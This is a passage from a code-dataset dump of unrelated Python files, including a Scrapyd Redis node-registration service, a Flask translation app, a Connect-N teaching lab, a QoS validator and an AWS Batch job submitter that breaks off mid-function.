frase.')\nelse:\n print(f'A vogal \"U\" se encontra na(s) posição(ões) {posicoesU}.')","sub_path":"contador_vogais_posicoes.py","file_name":"contador_vogais_posicoes.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652440307","text":"#!/usr/bin/env python3\n\nfrom collections import namedtuple\nimport os\nfrom proceseq_16s.utilities import time_it\nfrom proceseq_16s import extract_taxonomy, gui_common\nimport tkinter as tk\nfrom tkinter import ttk\n\n\nclass Extractor(gui_common.VariableAreas):\n def __init__(self, parent):\n tk.Frame.__init__(self, parent)\n self.parent = parent\n\n self.input_file = gui_common.OpenDialogs(self, label='Input file:')\n self.input_file.grid(column=0, row=0, sticky='WE')\n\n self.output_file = gui_common.OpenDialogs(self, label='Output file:',\n ask_saveas=True)\n self.output_file.grid(column=0, row=1, sticky='WE')\n\n input_frame = ttk.Frame(self)\n input_frame.grid(column=0, row=2, sticky='WE', pady=(5))\n input_frame.grid_columnconfigure(1, weight=1)\n\n highes_level_label = ttk.Label(input_frame, text='Highest level used '\n 'for taxonomy aggregation (0 - off):',\n font=(None, 12))\n highes_level_label.grid(column=0, row=0, sticky='W', pady=(0, 10))\n self.highest_level = tk.IntVar()\n highes_level_entry = ttk.Entry(input_frame, width=8,\n textvariable=self.highest_level, font=(None, 12))\n highes_level_entry.grid(column=1, row=0, sticky='E', pady=(0, 10))\n\n taxonomy_length_label = ttk.Label(input_frame, text='Number of taxonomy levels '\n 'used by assigned taxonomy:',\n font=(None, 12))\n taxonomy_length_label.grid(column=0, row=1, sticky='W', pady=(0, 10))\n self.taxonomy_length = tk.IntVar()\n taxonomy_length_entry = ttk.Entry(input_frame, width=8,\n textvariable=self.taxonomy_length,\n font=(None, 12))\n taxonomy_length_entry.grid(column=1, row=1, sticky='E', pady=(0, 10))\n\n self.taxonomy_file = gui_common.OpenDialogs(\n self,\n label='Taxonomy file (no taxonomy file will be used, if it is left empty):')\n\n self.taxonomy_file.grid(column=0, row=3, sticky='WE')\n\n def validate_inputs(self, *args):\n '''Validation of values in relevant input widgets\n\n Returns\n -------\n namedtuple\n Named tuple containing 3 values:\n is_valid (bool): Result if it is valid of not\n message_lines (list): List of lines for error box\n info_lines (list): List of lines for warning box\n '''\n is_valid = True\n message_lines = []\n info_lines = []\n\n ValidationResult = namedtuple('ValidationResult', ['is_valid',\n 'message_lines',\n 'info_lines'])\n\n if not os.path.isfile(self.input_file.text):\n is_valid = is_valid and False\n message_lines.append('Invalid input file!')\n\n if (self.taxonomy_file.text.strip() != '' and\n not os.path.isfile(self.taxonomy_file.text)):\n is_valid = is_valid and False\n message_lines.append('Invalid taxonomy file!')\n\n if self.highest_level.get() > self.taxonomy_length.get():\n message_lines.append('Highest level must not be higher than number of '\n 'taxonomy levels!')\n is_valid = is_valid and False\n\n return ValidationResult(is_valid=is_valid,\n message_lines=message_lines,\n info_lines=info_lines)\n\n def fill_defaults(self, config):\n '''Fill default values from a config file'''\n\n try:\n parameters = config['Extract taxonomy']\n except KeyError:\n parameters = {}\n\n self.highest_level.set(parameters.get('Highest level', ''))\n self.taxonomy_length.set(parameters.get('Number of taxonomy levels', ''))\n\n @time_it\n def run(self, *args):\n '''Run extraction of marked taxonomy data and their count'''\n\n with open(self.input_file.text, 'r') as input_file, \\\n open(self.output_file.text, 'w') as output_file:\n\n if self.taxonomy_file.text.strip() == '':\n taxonomy_file = None\n else:\n taxonomy_file = open(self.taxonomy_file.text.strip(), 'r')\n\n if self.highest_level.get() == 0:\n highest_level = self.taxonomy_length.get()\n else:\n highest_level = self.highest_level.get()\n\n extract_taxonomy.read_line(input_file,\n out_file=output_file,\n taxonomy_file=taxonomy_file,\n highest_level=highest_level,\n taxonomy_length=self.taxonomy_length.get())\n\n if taxonomy_file is not None:\n taxonomy_file.close()\n","sub_path":"proceseq_16s/gui_extract_taxonomy.py","file_name":"gui_extract_taxonomy.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90707762","text":"import multiprocessing\nimport os\n\nfrom twisted.application.service import Application\nfrom twisted.application.internet import TimerService, TCPServer\nfrom twisted.web import server\nfrom twisted.python import log\n\nimport traceback\nimport socket\nimport psutil\nimport redis\nimport requests\nimport json\n\nfrom scrapy.utils.misc import load_object\n\nfrom .interfaces import IEggStorage, IPoller, ISpiderScheduler, IEnvironment\nfrom .eggstorage import FilesystemEggStorage\nfrom .scheduler import SpiderScheduler\nfrom .poller import QueuePoller\nfrom .environ import Environment\n\n\ndef application(config):\n app = Application(\"Scrapyd\")\n http_port = config.getint('http_port', 6800)\n bind_address = config.get('bind_address', '127.0.0.1')\n poll_interval = config.getfloat('poll_interval', 5)\n\n poller = QueuePoller(config)\n eggstorage = FilesystemEggStorage(config)\n scheduler = SpiderScheduler(config)\n environment = Environment(config)\n\n app.setComponent(IPoller, poller)\n app.setComponent(IEggStorage, eggstorage)\n app.setComponent(ISpiderScheduler, scheduler)\n app.setComponent(IEnvironment, environment)\n\n laupath = config.get('launcher', 'scrapyd.launcher.Launcher')\n laucls = load_object(laupath)\n launcher = laucls(config, app)\n\n webpath = config.get('webroot', 'scrapyd.website.Root')\n webcls = load_object(webpath)\n\n timer = TimerService(poll_interval, poller.poll)\n webservice = TCPServer(http_port, server.Site(\n webcls(config, app)), interface=bind_address)\n log.msg(format=\"Scrapyd web console available at http://%(bind_address)s:%(http_port)s/\",\n bind_address=bind_address, http_port=http_port)\n\n launcher.setServiceParent(app)\n timer.setServiceParent(app)\n webservice.setServiceParent(app)\n\n host = get_host_ip(config)\n redis_host = config.get('redis_host', 'localhost')\n redis_port = config.get('redis_port', 6379)\n redis_db = config.get('redis_db', 0)\n redis_pool = redis.ConnectionPool(\n host=redis_host,\n port=redis_port,\n db=redis_db\n )\n register_to_redis(config, redis_pool)\n log.msg('Registering scrapyd [{}] to redis {}:{} at db {}'.format(host, redis_host, redis_port, redis_db))\n # log.msg('2018-11-03 10:10 am')\n redis_interval = config.getfloat('redis_interval', 5)\n register_timer = TimerService(\n redis_interval, register_to_redis, config, redis_pool)\n register_timer.setServiceParent(app)\n\n return app\n\n\nfailure_count = 0\n\n\ndef register_to_redis(config, redis_pool):\n global failure_count\n try:\n redis_key = config.get('redis_key', 'scrapyd:nodes')\n host_ip = get_host_ip(config)\n if host_ip is None:\n host_name = socket.gethostname()\n message = '\"host_ip\" is not configured, scrapyd [{}] not registered'.format(\n host_name)\n log.msg(message)\n if config.get('notify', False):\n notify(config, message)\n return\n host_port = config.get('http_port', 6800)\n host = '{}:{}'.format(host_ip, host_port)\n mem_free = int(psutil.virtual_memory().available / 1048576)\n cpu_load = os.getloadavg()[0]\n n_cpu = multiprocessing.cpu_count()\n value = f\"{mem_free}|{cpu_load}|{n_cpu}\"\n\n r = redis.Redis(connection_pool=redis_pool)\n if r.hset(redis_key, host, value):\n log.msg('Scrapyd [{}] registered to redis again.'.format(host))\n failure_count = 0\n except Exception as err:\n failure_count += 1\n log.msg(err)\n message = traceback.format_exc()\n if failure_count < 10:\n notify(config, message)\n\n\ndef get_host_ip(config):\n _ip = None\n try:\n _ip = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith(\"127.\")][:1], [[(s.connect(\n ('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]\n except Exception as err:\n log.msg(err)\n return config.get('host_ip', _ip)\n\n\ndef notify(config, message):\n key = config.get('notify_key', '')\n if key == '':\n return\n url = 'https://hooks.slack.com/services/{}'.format(key)\n headers = {'content-type': 'application/json'}\n payload = {'text': message}\n requests.post(url, data=json.dumps(payload), headers=headers)\n","sub_path":"scrapyd/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5250047","text":"from flask import Flask, render_template, request\nfrom wtforms import Form, TextAreaField, validators\nimport os\nimport numpy as np\nfrom translation import *\nimport sentencepiece as spm\nimport re\nfrom fairseq.models.transformer import TransformerModel\n\napp = Flask(__name__)\n\n######## Preparing the translator\n#cur_dir = os.path.dirname(__file__)\nsp = spm.SentencePieceProcessor()\nsp.load(\"models/jsec.ja.model\")\n\nja2en = TransformerModel.from_pretrained(\n 'checkpoints/98subwords/',\n checkpoint_file='checkpoint_best.pt',\n data_name_or_path='data/bin/98_subwords/'\n)\n\n######## Flask\nclass TextForm(Form):\n source = TextAreaField('', [validators.DataRequired(), validators.length(min=5)])\n\n@app.route('/')\ndef index():\n form = TextForm(request.form)\n #text = translate(form)\n return render_template('textform.html', form=form, target=None)\n\n@app.route('/', methods=['POST'])\ndef results():\n form = TextForm(request.form)\n if request.method == 'POST' and form.validate():\n source = request.form['source']\n target = translate(source)\n \n return render_template('textform.html',\n #source=source,\n form=form,\n target=target)\n \n #return render_template('reviewform.html', form=form)\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"hiroto/chapter10/knock99/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246853746","text":"\"\"\" Lab 04 Optional Questions \"\"\"\n\nfrom lab04 import *\n\n# Q6\ndef flatten(lst):\n \"\"\"Returns a flattened version of lst.\n\n >>> flatten([1, 2, 3]) # normal list\n [1, 2, 3]\n >>> x = [1, [2, 3], 4] # deep list\n >>> flatten(x)\n [1, 2, 3, 4]\n >>> x = [[1, [1, 1]], 1, [1, 1]] # deep list\n >>> flatten(x)\n [1, 1, 1, 1, 1, 1]\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Base case: if it's only an empty list left, just return that empty list []\n if not lst:\n return []\n # If the currently selected (the first) element is a nested list, recursive call flatten on that element and the rest\n elif type(lst[0]) == list:\n return flatten(lst[0]) + flatten(lst[1:])\n else:\n return [lst[0]] + flatten(lst[1:])\n\n# Q7\ndef merge(lst1, lst2):\n \"\"\"Merges two sorted lists.\n\n >>> merge([1, 3, 5], [2, 4, 6])\n [1, 2, 3, 4, 5, 6]\n >>> merge([], [2, 4, 6])\n [2, 4, 6]\n >>> merge([1, 2, 3], [])\n [1, 2, 3]\n >>> merge([5, 7], [2, 4, 6])\n [2, 4, 5, 6, 7]\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # This implementation assumes that there are no same elements and no nested list.\n # Base case: if one of the lists is empty, then just add up both lists\n if not lst1 or not lst2:\n return lst1 + lst2\n # Recursive case 1: If the first element of lst1 is smaller than the first element of lst2,\n # then return that element from lst1 (in form of list) plus a recursive call excluding that element\n elif lst1[0] < lst2[0]:\n return [lst1[0]] + merge(lst1[1:], lst2)\n # Recursive case 2: similar to recursive case 1, but this time if the first element of lst2 is smaller than that of lst1\n else:\n return [lst2[0]] + merge(lst1, lst2[1:])\n \n \n\n######################\n### Connect N Game ###\n######################\n\ndef create_row(size):\n \"\"\"Returns a single, empty row with the given size. Each empty spot is\n represented by the string '-'.\n\n >>> create_row(5)\n ['-', '-', '-', '-', '-']\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Straightforward implementation using list comprehension\n return ['-' for i in range(size)]\n\n\ndef create_board(rows, columns):\n \"\"\"Returns a board with the given dimensions.\n\n >>> create_board(3, 5)\n [['-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-'], ['-', '-', '-', '-', '-']]\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Also straightforward, make use of the create_row function\n return [create_row(columns) for i in range(rows)]\n\n\ndef replace_elem(lst, index, elem):\n \"\"\"Create and return a new list whose elements are the same as those in\n LST except at index INDEX, which should contain element ELEM instead.\n\n >>> old = [1, 2, 3, 4, 5, 6, 7]\n >>> new = replace_elem(old, 2, 8)\n >>> new\n [1, 2, 8, 4, 5, 6, 7]\n >>> new is old # check that replace_elem outputs a new list\n False\n \"\"\"\n assert index >= 0 and index < len(lst), 'Index is out of bounds'\n \"*** YOUR CODE HERE ***\"\n return lst[:index] + [elem] + lst[index+1:]\n\n\ndef get_piece(board, row, column):\n \"\"\"Returns the piece at location (row, column) in the board.\n\n >>> rows, columns = 2, 2\n >>> board = create_board(rows, columns)\n >>> board = put_piece(board, rows, 0, 'X')[1] # Puts piece \"X\" in column 0 of board and updates board\n >>> board = put_piece(board, rows, 0, 'O')[1] # Puts piece \"O\" in column 0 of board and updates board\n >>> get_piece(board, 1, 0)\n 'X'\n >>> get_piece(board, 1, 1)\n '-'\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n return board[row][column]\n\n\ndef put_piece(board, max_rows, column, player):\n \"\"\"Puts PLAYER's piece in the bottommost empty spot in the given column of\n the board. Returns a tuple of two elements:\n\n 1. The index of the row the piece ends up in, or -1 if the column\n is full.\n 2. The new board\n\n >>> rows, columns = 2, 2\n >>> board = create_board(rows, columns)\n >>> row, new_board = put_piece(board, rows, 0, 'X')\n >>> row\n 1\n >>> row, new_board = put_piece(new_board, rows, 0, 'O')\n >>> row\n 0\n >>> row, new_board = put_piece(new_board, rows, 0, 'X')\n >>> row\n -1\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Initiate the currently selected row\n row_i = max_rows - 1\n # Climb up the rows until Python reaches the first bottom-most empty spot. If Python can't find empty spot, row_i would be kept decrementing until\n # it reaches -1\n while row_i >= 0 and get_piece(board, row_i, column) != '-':\n row_i -= 1\n # After climbing all the way up, if the currently selected row is not a negative number, use replace-elem to put the 'O' or 'X' piece\n if row_i >= 0:\n # Create a new row where the index is the column\n new_row = replace_elem(board[row_i], column, player)\n # Create a new board incorporating the new_row above. The index is the currently selected row\n new_board = replace_elem(board, row_i, new_row)\n board = new_board\n return (row_i, board)\n\n\ndef make_move(board, max_rows, max_cols, col, player):\n \"\"\"Put player's piece in column COL of the board, if it is a valid move.\n Return a tuple of two values:\n\n 1. If the move is valid, make_move returns the index of the row the\n piece is placed in. Otherwise, it returns -1.\n 2. The updated board\n\n >>> rows, columns = 2, 2\n >>> board = create_board(rows, columns)\n >>> row, board = make_move(board, rows, columns, 0, 'X')\n >>> row\n 1\n >>> get_piece(board, 1, 0)\n 'X'\n >>> row, board = make_move(board, rows, columns, 0, 'O')\n >>> row\n 0\n >>> row, board = make_move(board, rows, columns, 0, 'X')\n >>> row\n -1\n >>> row, board = make_move(board, rows, columns, -4, '0')\n >>> row\n -1\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Very similar to put_piece function. The only difference is that make_move might give out invalid column input\n if col >= 0 and col <= max_cols:\n return put_piece(board, max_rows, col, player)\n else:\n return (-1, board)\n\ndef print_board(board, max_rows, max_cols):\n \"\"\"Prints the board. Row 0 is at the top, and column 0 at the far left.\n\n >>> rows, columns = 2, 2\n >>> board = create_board(rows, columns)\n >>> print_board(board, rows, columns)\n - -\n - -\n >>> new_board = make_move(board, rows, columns, 0, 'X')[1]\n >>> print_board(new_board, rows, columns)\n - -\n X -\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Iterate through the rows, starting with row 0\n for row in range(max_rows):\n # row_str stores the string of pieces so far\n row_str = ''\n # iterate through the columns, starting with column 0\n for col in range(max_cols):\n # Use the get_piece function to obtain each piece, adding a whitespace in the end\n row_str += get_piece(board, row, col) + ' '\n # The outcome of row_str has an extra space at the end. We can get rid of it using .strip()\n print(row_str.strip())\n \n\ndef check_win_row(board, max_rows, max_cols, num_connect, row, player):\n \"\"\" Returns True if the given player has a horizontal win\n in the given row, and otherwise False.\n\n >>> rows, columns, num_connect = 4, 4, 2\n >>> board = create_board(rows, columns)\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> board = make_move(board, rows, columns, 0, 'O')[1]\n >>> check_win_row(board, rows, columns, num_connect, 3, 'O')\n False\n >>> board = make_move(board, rows, columns, 2, 'X')[1]\n >>> board = make_move(board, rows, columns, 0, 'O')[1]\n >>> check_win_row(board, rows, columns, num_connect, 3, 'X')\n False\n >>> board = make_move(board, rows, columns, 1, 'X')[1]\n >>> check_win_row(board, rows, columns, num_connect, 3, 'X')\n True\n >>> check_win_row(board, rows, columns, 4, 3, 'X') # A win depends on the value of num_connect\n False\n >>> check_win_row(board, rows, columns, num_connect, 3, 'O') # We only detect wins for the given player\n False\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n count = 0 #Counts the number of pieces that are the same as player so far\n for col in range(max_cols):\n # For every column selected in a row, if the piece is the same as player, increment count\n if get_piece(board, row, col) == player:\n count += 1\n # Then if the count is the same or greater than num_connect, then the winning condition is fulfilled\n if count >= num_connect:\n return True\n # If the piece selected is not the same as player, reset the count\n else:\n count = 0\n return False\n\ndef check_win_column(board, max_rows, max_cols, num_connect, col, player):\n \"\"\" Returns True if the given player has a vertical win in the given column,\n and otherwise False.\n\n >>> rows, columns, num_connect = 5, 5, 2\n >>> board = create_board(rows, columns)\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> check_win_column(board, rows, columns, num_connect, 0, 'X')\n False\n >>> board = make_move(board, rows, columns, 1, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> check_win_column(board, rows, columns, num_connect, 1, 'O')\n False\n >>> board = make_move(board, rows, columns, 2, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> check_win_column(board, rows, columns, num_connect, 1, 'O')\n True\n >>> check_win_column(board, rows, columns, 4, 1, 'O')\n False\n >>> check_win_column(board, rows, columns, num_connect, 1, 'X')\n False\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # Same implementation as check_win_row, but this time we vary the rows\n count = 0\n for row in range(max_rows):\n if get_piece(board, row, col) == player:\n count += 1\n if count >= num_connect:\n return True\n else:\n count = 0\n return False\n\ndef check_win(board, max_rows, max_cols, num_connect, row, col, player):\n \"\"\"Returns True if the given player has any kind of win passing through \n (row, col), and False otherwise.\n\n >>> rows, columns, num_connect = 2, 2, 2\n >>> board = create_board(rows, columns)\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> check_win(board, rows, columns, num_connect, 0, 0, 'O')\n False\n >>> check_win(board, rows, columns, num_connect, 0, 0, 'X')\n True\n\n >>> board = create_board(rows, columns)\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> board = make_move(board, rows, columns, 0, 'O')[1]\n >>> board = make_move(board, rows, columns, 1, 'X')[1]\n >>> check_win(board, rows, columns, num_connect, 1, 0, 'X')\n True\n >>> check_win(board, rows, columns, num_connect, 0, 0, 'X')\n False\n\n >>> board = create_board(rows, columns)\n >>> board = make_move(board, rows, columns, 0, 'X')[1]\n >>> board = make_move(board, rows, columns, 1, 'O')[1]\n >>> board = make_move(board, rows, columns, 1, 'X')[1]\n >>> check_win(board, rows, columns, num_connect, 0, 0, 'X')\n False\n >>> check_win(board, rows, columns, num_connect, 1, 0, 'X')\n True\n \"\"\"\n diagonal_win = check_win_diagonal(board, max_rows, max_cols, num_connect,\n row, col, player)\n \"*** YOUR CODE HERE ***\"\n return diagonal_win or \\\n check_win_row(board, max_rows, max_cols,num_connect, row, player) or \\\n check_win_column(board, max_rows, max_cols, num_connect, col, player)\n\n\n###############################################################\n### Functions for reference when solving the other problems ###\n###############################################################\n\ndef check_win_diagonal(board, max_rows, max_cols, num_connect, row, col, player):\n \"\"\" Returns True if the given player has a diagonal win passing the spot\n (row, column), and False otherwise.\n \"\"\"\n # Find top left of diagonal passing through (row, col).\n adjacent = 0\n row_top_left, col_top_left = row, col\n while row_top_left > 0 and col_top_left > 0:\n row_top_left -= 1\n col_top_left -= 1\n\n # Loop through top left to bottom right diagonal and check for win.\n while row_top_left < max_rows and col_top_left < max_cols:\n piece = get_piece(board, row_top_left, col_top_left)\n if piece == player:\n adjacent += 1\n else:\n adjacent = 0\n if adjacent >= num_connect:\n return True\n row_top_left += 1\n col_top_left += 1\n\n # Find top right of diagonal passing through (row, col).\n adjacent = 0\n row_top_right, col_top_right = row, col\n while row_top_right > 0 and col_top_right < max_cols - 1:\n row_top_right -= 1\n col_top_right += 1\n\n # Loop through top right to bottom left diagonal and check for win.\n while row_top_right < max_rows and col_top_right >= 0:\n piece = get_piece(board, row_top_right, col_top_right)\n if piece == player:\n adjacent += 1\n else:\n adjacent = 0\n if adjacent >= num_connect:\n return True\n row_top_right += 1\n col_top_right -= 1\n\n return False\n\n#####################################################################################\n### You do not need to read or understand the following code for this assignment. ###\n#####################################################################################\n\nimport sys\n\ndef other(player):\n \"\"\" Returns the given player's opponent.\n \"\"\"\n if player == 'X':\n return 'O'\n return 'X'\n\ndef play(board, max_rows, max_cols, num_connect):\n max_turns = max_rows * max_cols\n playing = True\n print(\"Player 'X' starts\")\n who = 'X'\n turns = 0\n\n while True:\n turns += 1\n if turns > max_turns:\n print(\"No more moves. It's a tie!\")\n sys.exit()\n\n while True:\n try:\n col_index = int(input('Which column, player {}? '.format(who)))\n except ValueError as e:\n print('Invalid input. Please try again.')\n continue\n\n row_index, board = make_move(board, max_rows, max_cols, col_index, who)\n\n if row_index != -1:\n break\n\n print(\"Oops, you can't put a piece there\")\n\n print_board(board, max_rows, max_cols)\n\n if check_win(board, max_rows, max_cols, num_connect, row_index, col_index, who):\n print(\"Player {} wins!\".format(who))\n sys.exit()\n\n who = other(who)\n\ndef start_game():\n # Get all parameters for the game from user.\n while True:\n # Get num_connect from user.\n while True:\n try:\n num_connect = int(input('How many to connect (e.g. 4 for Connect 4)? '))\n except ValueError as e:\n print('Invalid input. Please try again.')\n continue\n break\n\n # Get number of rows for board from user.\n while True:\n try:\n max_rows = int(input('How many rows? '))\n except ValueError as e:\n print('Invalid input. Please try again.')\n continue\n break\n\n # Get number of columns for board from user.\n while True:\n try:\n max_cols = int(input('How many columns? '))\n except ValueError as e:\n print('Invalid input. Please try again.')\n continue\n break\n\n if max_rows >= num_connect or max_cols >= num_connect:\n break\n print(\"Invalid dimensions for connect {0}. Please try again.\".format(num_connect))\n\n board = create_board(max_rows, max_cols)\n play(board, max_rows, max_cols, num_connect)","sub_path":"Lab/lab04/lab04_extra.py","file_name":"lab04_extra.py","file_ext":"py","file_size_in_byte":15981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569931155","text":"#!/usr/bin/env python3\n\nimport simplejson as json\nfrom collections import OrderedDict\n\nclass Json():\n __jsonData = None\n def __init__(self, filename = False):\n if filename != False:\n try:\n jsonfile = open(filename)\n js = json.loads(jsonfile.read())\n sort = (sorted(js.items(), key=lambda x: x[0]))\n self.__jsonData = sort\n print(sort)\n jsonfile.close()\n except FileNotFoundError:\n print(\"Json File not found!\")\n except Exception as e:\n print(\"Exception handling Json file\")\n print(repr(e))\n \n\n def fetch(self):\n return self.__jsonData\n\n def savestate(self, data, filename):\n try:\n file_h = open(filename, 'w')\n file_h.write(json.dumps(data, sort_keys=True))\n except Exception as e:\n print(\"Something went wrong in the json.savestate method\")\n\n","sub_path":"healthi/handler/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486509481","text":"#!/usr/bin/env python\n# Copyright (C) 2015-2016 Hewlett Packard Enterprise Development LP\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom opsvalidator.base import BaseValidator\nfrom opsvalidator import error\nfrom opsvalidator.error import ValidationError\n\nimport qos_utils\n\n#\n# REST Custom Validator for QoS for the QoS DSCP Map Entry table.\n#\n\n\nclass QosDscpMapEntryValidator(BaseValidator):\n resource = \"qos_dscp_map_entry\"\n\n #\n # Validates that the given modification to a given row is allowed.\n #\n def validate_modification(self, validation_args):\n if validation_args.is_new:\n details = \"DSCP Map Entries cannot be created.\"\n raise ValidationError(error.VERIFICATION_FAILED, details)\n\n qos_dscp_map_entry_row = validation_args.resource_row\n self.validate_dscp_map_description_contains_valid_chars(\n qos_dscp_map_entry_row)\n\n # Cos (priority_code_point) is not supported for dill.\n self.validate_priority_code_point_is_empty(\n qos_dscp_map_entry_row)\n\n #\n # Validates that the given deletion of a given row is allowed.\n #\n def validate_deletion(self, validation_args):\n details = \"DSCP Map Entries cannot be deleted.\"\n raise ValidationError(error.VERIFICATION_FAILED, details)\n\n #\n # Validates that the dscp map desctiption contains valid characters.\n #\n def validate_dscp_map_description_contains_valid_chars(\n self, qos_dscp_map_entry_row):\n if qos_dscp_map_entry_row.description is None:\n return\n\n description = qos_dscp_map_entry_row.description[0]\n qos_utils.validate_string_contains_valid_chars(description)\n\n #\n # Validates that the priority_code_point field is empty, since it is\n # not supported for dill.\n #\n def validate_priority_code_point_is_empty(\n self, qos_dscp_map_entry_row):\n # Cos (priority_code_point) is not supported for dill.\n if qos_dscp_map_entry_row.priority_code_point != []:\n details = \"The priority_code_point field \" + \\\n \"is not currently supported.\"\n raise ValidationError(error.VERIFICATION_FAILED, details)\n","sub_path":"ops/opsplugins/qos/qos_dscp_map_entry.py","file_name":"qos_dscp_map_entry.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14236743","text":"from itertools import product\n\n\ndef iscomp(n):\n for i in range(2, 10000):\n if not n % i:\n return i\n return False\n\n\ninput()\nresult = []\nn, j = map(int, input().split())\nfor ii, coin in enumerate(product(\"01\", repeat=n-2)):\n coin = \"1\" + \"\".join(coin) + \"1\"\n # if ii % 1 == 0:\n # print(\"\\t\", ii, coin)\n divs = []\n for i in range(2, 11):\n m = int(coin, i)\n divs.append(iscomp(m))\n if not divs[-1]:\n break\n else:\n # print(coin)\n result.append((coin, divs))\n if len(result) == j:\n break\nprint(\"Case #1:\")\nfor c, divs in result:\n print(c, \" \".join(map(str, divs)))\n","sub_path":"solutions_5738606668808192_1/Python/MaksK/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466442506","text":"from __future__ import print_function\nimport boto3\nimport urllib\nimport re\nimport os.path\n\n\nreporter_dict = {\n \"WA\": \"1\",\n \"OH\": \"2\",\n \"NY\": \"3\",\n \"FL\": \"4\",\n \"MI\": \"5\"\n}\n\n\ndef submit_file_copy_job(client, bucket, key):\n s3_path = \"s3://%s/%s\" % (bucket, key)\n command = {\"command\": [\"sh\", \"-cxv\", \"aws s3 cp %s /work; chmod go+rw /work/%s\" % (s3_path, key)]}\n\n job_submit_result = client.submit_job(jobName='CopyVoterFile', jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='S3Ops', containerOverrides=command)\n\n job_id = job_submit_result['jobId']\n return job_id\n\n\ndef submit_unzip_job(client, input_file, extension, dependsOn):\n\n if extension == '.gz':\n command = {\"command\": [\"sh\", \"-cxv\", \"gunzip -f \"+input_file]}\n elif extension == '.zip':\n command = {\"command\": [\"sh\", \"-cxv\", \"unzip -f \"+input_file]}\n else:\n raise Exception(\"Unrecognized compressed file extension: \"+extension)\n\n job_submit_result = client.submit_job(jobName='UnzipVoterFile', jobQueue='National-Voter-File-Job-Queue',dependsOn=dependsOn,\n jobDefinition='BusyBox', containerOverrides=command)\n\n job_id = job_submit_result['jobId']\n return job_id\n\n\ndef submit_transform_job(batch_client, input_file, state_name, dependsOn):\n xform_command = {\"command\": [\"--configfile\", \"/work/load_conf.json\", \"-s\", state_name, \"--input_file\",\n input_file, \"transform\"]}\n\n job_submit_result = batch_client.submit_job(jobName='Transform' + state_name,\n jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='ETL', dependsOn=dependsOn,\n containerOverrides=xform_command)\n return job_submit_result['jobId']\n\n\ndef submit_precinct_job(batch_client, input_file, state_name, report_date, dependsOn):\n xform_command = {\n \"command\": [\"--configfile\", \"/work/load_conf.json\", \"--update_jndi\", \"--report_date\", report_date, \"-s\",\n state_name, \"--input_file\",\n input_file, \"precincts\"]}\n\n job_submit_result = batch_client.submit_job(jobName='LoadPrecincts' + state_name + report_date,\n jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='ETL', dependsOn=dependsOn,\n containerOverrides=xform_command)\n return job_submit_result['jobId']\n\n\ndef submit_load_job(batch_client, input_file, state_name, report_date, reporter, dependsOn):\n xform_command = {\"command\": [\"--configfile\", \"/work/load_conf.json\", \"--update_jndi\", \"--report_date\", report_date,\n \"--reporter_key\", reporter, \"-s\", state_name, \"--input_file\",\n input_file, \"load\"]}\n\n job_submit_result = batch_client.submit_job(jobName='LoadVoterFile' + state_name + report_date,\n jobQueue='National-Voter-File-Job-Queue',\n jobDefinition='ETL', dependsOn=dependsOn,\n containerOverrides=xform_command)\n return job_submit_result['jobId']\n\n\ndef submit_vote_history_job(batch_client, input_file, state_name, report_date, reporter, dependsOn):\n xform_command = {\"command\": [\"--configfile\", \"/work/load_conf.json\", \"--update_jndi\", \"--report_date\", report_date,\n \"--reporter_key\", reporter, \"-s\", state_name, \"--input_file\",\n input_file, \"history\"]}\n\n job_submit_result = batch_client.submit_job(jobName='LoadVoterHistory' + state_name + 